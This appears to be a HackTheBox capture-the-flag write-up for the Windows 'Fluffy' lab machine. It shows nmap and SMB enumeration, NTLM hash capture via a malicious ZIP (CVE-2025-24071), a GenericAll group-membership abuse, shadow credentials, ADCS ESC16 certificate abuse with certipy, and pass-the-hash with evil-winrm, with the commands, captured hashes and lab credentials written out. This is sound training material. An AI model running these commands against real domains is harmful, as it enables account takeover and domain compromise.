HackTheBox Fluffy Writeup
A walkthrough of the HackTheBox 'Fluffy' machine which is easy rated windows box. This write-up covers initial access, privilege escalation, and post-exploitation techniques.
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!
RECONNAISSANCE
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ nmap -sC -sV 10.129.66.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 04:40 EDT
Nmap scan report for 10.129.66.55
Host is up (0.23s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-25 15:41:16Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T15:42:39+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T15:42:40+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T15:42:39+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T15:42:40+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
| smb2-time:
| date: 2025-05-25T15:41:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.43 seconds
Using the given credential if we list the shares available, we will find something interesting
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ nxc smb fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.129.66.55 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.66.55 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.66.55 445 DC01 [*] Enumerated shares
SMB 10.129.66.55 445 DC01 Share Permissions Remark
SMB 10.129.66.55 445 DC01 ----- ----------- ------
SMB 10.129.66.55 445 DC01 ADMIN$ Remote Admin
SMB 10.129.66.55 445 DC01 C$ Default share
SMB 10.129.66.55 445 DC01 IPC$ READ Remote IPC
SMB 10.129.66.55 445 DC01 IT READ,WRITE
SMB 10.129.66.55 445 DC01 NETLOGON READ Logon server share
SMB 10.129.66.55 445 DC01 SYSVOL READ Logon server share
This challenge is currently active on HackTheBox.
In accordance with HackTheBox's content policy, this writeup will be made publicly available only after the challenge is retired.
For hints or to chat with the community, join the Dollar T.V Discord server
or send DM on Twitter (X) dollarboysushil.
We have Read + Write access on IT share. Write access is interesting and unlocks a lot of attack path.
Looking at the content on the IT share.
Opening Upgrade_Notice.pdf shows the system are in upgrade process and have multiple vulnerabilities.
Among the listed CVE’s, CVE-2025-24071 stands out.
CVE-2025-24071 : An unauthenticated attacker can exploit this vulnerability by constructing RAR/ZIP files containing a malicious SMB path. Upon decompression, this triggers an SMB authentication request, potentially exposing the user’s NTLM hash
Since we have write access to IT share, we will use CVE-2025-24071 exploit to generate malicious zip file, then upload it to IT share. After certain time it will be unzipped, meanwhile we will setup reponder and catch the victims hash.
1
p.agila::FLUFFY:44ba23f06d0012ce:2F92099ED0B0BB5FC9F5531238508F8A:0101000000000000802DEDF370CDDB015B78C485618BA9120000000002000800560034004B00310001001E00570049004E002D0058003800350037003300300048004F0033005300510004003400570049004E002D0058003800350037003300300048004F003300530051002E00560034004B0031002E004C004F00430041004C0003001400560034004B0031002E004C004F00430041004C0005001400560034004B0031002E004C004F00430041004C0007000800802DEDF370CDDB010600040002000000080030003000000000000000010000000020000040057427D0CC477C70729646E098F3FFCC99AA397785A5948567ED6E8FF151AE0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310035002E00310036000000000000000000
We now have NTLM hash of user p.agila.
Using hashcat, we can crack the hash
now we have access to user p.agila, p.agila:prometheusx-303
Bloodhound
Using any of the credential, we can dump the data of active directory using bloodhound ingestor. I will be using netexec.
In bloodhound gui
We can see user p.agila is member of Service Account Managers group and this group has GenericAll permission over Service Accounts Group.
Generic All Exploit
To exploit Generic All permission, we will add user p.agila to Service Accounts group
1
net rpc group addmem "Service accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.66.55"
Verifying the group membership
1
net rpc group members "Service accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.66.55"
Upon deeper dive, we can see Service Accounts Group has GenericWrite permission over 3 users.
Generic Write Exploit
To exploit Generic Write permisison, we will use certipy-ad to perform shadow Credentials attack and dump the NTLM hash.
Using the NTLM hash of winrm_svc user, we can get win-rm session using evil-winrm and get User.txt
PRIVILEGE ESCALATION
Similarly we can dump NTLM hash of user ca_svc . With the access to ca_svc user, we get hint about ADCS attack.
Using certipy-ad we can check for Vulnerabilities in ADCS.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ certipy-ad find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.129.93.221 -stdout -vuln
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
There exist ESC16 Vulnerability. Using ESC16-Certipy guide we can proceed to priv esc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ certipy-ad account -u [email protected] -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.93.221 -user ca_svc read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : [email protected]
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-05-25T20:30:14+00:00
Initially UPN of user ca_svc is ca_svc
Lets update upn to administrator.
Conforming the change in upn.
After the upn is updated, lets request certificate.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/fluffy]
└─$ certipy-ad req -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.18.44 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[] Requesting certificate via RPC
[] Request ID is 16
[] Successfully requested certificate
[] Got certificate with UPN 'administrator'
[] Certificate has no object SID
[] Try using -sid to set the object SID or see the wiki for more details
[] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): n
[] Wrote certificate and private key to 'administrator_715a5adc-5576-48d6-bf1b-450016b8a3e1.pfx'
We now have certificate of administrator.
Before using this certificate to login as user administrator, we need to reset upn of user ca_svc
Now we can use the administrator’s certificate.
We now have NTLM hash of administrator.
Using this NTLM hash, we can get win-rm session as user administrator and get the root.txt.
1
2
evil-winrm -i certificate.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e